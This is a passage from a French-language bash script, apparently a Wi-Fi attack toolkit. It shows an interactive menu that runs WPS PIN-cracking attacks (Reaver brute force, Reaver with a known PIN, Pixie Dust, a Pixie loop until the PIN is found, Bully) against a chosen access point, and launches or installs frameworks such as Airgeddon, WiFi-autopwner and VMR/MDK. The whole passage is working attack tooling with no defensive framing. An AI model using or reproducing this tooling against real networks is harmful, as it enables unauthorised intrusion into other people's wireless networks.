	echo -e ""$YS" 1"$CE") Scanner avec wash         Sélectionné: "$YS"$ESSIDT"$CE""
fi
echo -e ""$YS" 2"$CE") Reaver bruteforce"
echo -e ""$YS" 3"$CE") Reaver                      (si vous avez déjà le pin WPS)"
echo -e ""$YS" 4"$CE") Pixie Dust"
echo -e ""$YS" 5"$CE") Pixie loop Jusqu'à trouver le pin"
if [[ -f /usr/bin/bully ]]
then
	echo -e ""$YS" 6"$CE") Bully                       SCRIPT AUTOMATISÉ"
	echo -e ""$YS" 7"$CE") Bully"
else
	echo -e ""$RS" 6"$CE") "$RS"Bully"$CE"                        SCRIPT AUTOMATISÉ"
	echo -e ""$RS" 7"$CE") "$RS"Bully"$CE""
fi
if [[ -d /root/WiFi-autopwner ]]
then
	echo -e ""$YS" 8"$CE") WiFi autopwner"
else
	echo -e ""$RS" 8"$CE") "$RS"WiFi autopwner"$CE""
fi
if [[ -d /root/airgeddon ]]
then
	echo -e ""$YS" 9"$CE") Airgeddon"
else
	echo -e ""$RS" 9"$CE") "$RS"Airgeddon"$CE""
fi
if [[ -d /root/VMR ]]
then
	echo -e ""$YS"10"$CE") VMR"
else
	echo -e ""$RS"10"$CE") "$RS"VMR"$CE""
fi
echo -e ""$YS"11"$CE") Voir le dernier log"
echo -e ""$YS" 0"$CE") Quitter"
echo -e "Choix: "
read -e YN
clear
if [[ "$YN" = "1" ]]
then
	scan_wash
elif [[ "$YN" = "2" ]]
then
	if [[ "$ESSIDT" != "" ]]
	then
		reaver_attack
	else
		echo -e ""$RS"Aucun réseau sélectionné"$CE""
		sleep 2
	fi
elif [[ "$YN" = "3" ]]
then
	if [[ "$ESSIDT" != "" ]]
	then
		echo -e "Entre le pin WPS de votre cible: "
		read -e WPST
		clear
		reaver -i $WLANNM -b $BSSIDT -c $CHANT -p $WPST -vv | tee /root/lscript/wpslog
		echo -e "Appuyez sur "$YS"entrer"$CE" pour revenir en arrière"
		read
	else
		echo -e ""$RS"Aucun réseau sélectionné"$CE""
		sleep 2
	fi

elif [[ "$YN" = "4" ]]
then
	if [[ "$ESSIDT" != "" ]]
	then
		pixie_attack
	else
		echo -e ""$RS"Aucun réseau sélectionné"$CE""
		sleep 2
	fi
elif [[ "$YN" = "5" ]]
then
	if [[ "$ESSIDT" != "" ]]
	then
		pixie_loop
	else
		echo -e ""$RS"Aucun réseau sélectionné"$CE""
		sleep 2
	fi
elif [[ "$YN" = "6" ]]
then
	if [[ -f /usr/bin/bully ]]
	then
		if [[ "$ESSIDT" != "" ]]
		then
			bully_script
		else
			echo -e ""$RS"Aucun réseau sélectionné"$CE""
			sleep 2
		fi
	else
		echo -e ""$RS"Bully n'est pas installé. Tapez '"$CE""$YS"install"$CE""$RS"' pour arrêter le mode moniteur et l'installer."$CE""
		read INSTALL
		if [[ "$INSTALL" = "install" ]]
		then
			stop2_menu
			echo -e "Appuyez sur "$YS"entrer"$CE" lorsqu'il est connecté à un réseau"
			read ENT
			install_bully
			start2_menu
		fi
	fi
elif [[ "$YN" = "7" ]]
then
	if [[ -f /root/bully/src/bully.py ]]
	then
		cd /root/bully/src
		./bully.py
		cd
	else
		echo -e ""$RS"Bully n'est pas installé. Tapez '"$CE""$YS"install"$CE""$RS"'pour arrêter le mode moniteur et l'installer."$CE""
		read INSTALL
		if [[ "$INSTALL" = "install" ]]
		then
			stop2_menu
			echo -e "Appuyez sur "$YS"entrer"$CE" lorsqu'il est connecté à un réseau"
			read ENT
			install_bully
			start2_menu
		fi
	fi
elif [[ "$YN" = "8" ]]
then
	if [[ -f /root/WiFi-autopwner/wifi-autopwner.sh ]]
	then
		cd /root/WiFi-autopwner
		./wifi-autopwner.sh
		cd
	else
		echo -e ""$RS"Wifi autopwner n'est pas installé. Tapez '"$CE""$YS"install"$CE""$RS"' pour arrêter le mode moniteur et l'installer."$CE""
		read INSTALL
		if [[ "$INSTALL" = "install" ]]
		then
			stop2_menu
			echo -e "Appuyez sur "$YS"entrer"$CE" lorsqu'il est connecté à un réseau"
			read ENT
			install_wifiautopwner
			start2_menu
		fi
	fi
elif [[ "$YN" = "9" ]]
then
	if [[ -d "/root/airgeddon" ]]
	then
		cd /root/airgeddon
		./airgeddon.sh
		cd
	else
		echo -e ""$RS"Airgeddon n'est pas installé. Tapez '"$CE""$YS"install"$CE""$RS"' pour arrêter le mode moniteur et l'installer."$CE""
		read INSTALL
		if [[ "$INSTALL" = "install" ]]
		then
			stop2_menu
			echo -e "Appuyez sur "$YS"entrer"$CE" lorsqu'il est connecté à un réseau"
			read ENT
			install_airgeddon
			start2_menu
		fi
	fi
elif [[ "$YN" = "10" ]]
then
	if [[ -d "/root/VMR" ]]
	then
		cd /root/VMR
		./VMR-MDK-K2-2017R-012x2.sh
	else
		echo -e ""$RS"VMR n'est pas installé. Tapez '"$CE""$YS"install"$CE""$RS"' pour arrêter le mode moniteur et l'installer."$CE""
		read INSTALL
		if [[ "$INSTALL" = "install" ]]
		then
			stop2_menu
			echo -e "Appuyez sur "$YS"entrer"$CE" lorsqu'il est connecté à un réseau"
			read ENT
			install_vmr
			start2_menu
		fi
	fi
elif [[ "$YN" = "11" ]]
then
	cat /root/lscript/wpslog
	echo -e "Appuyez sur "$YS"entrer"$CE" pour revenir en arrière"
	read
elif [[ "$YN" = "0" ]]
then
	exit
fi
done
}

####################################
defaults_lh3
main_wps_options
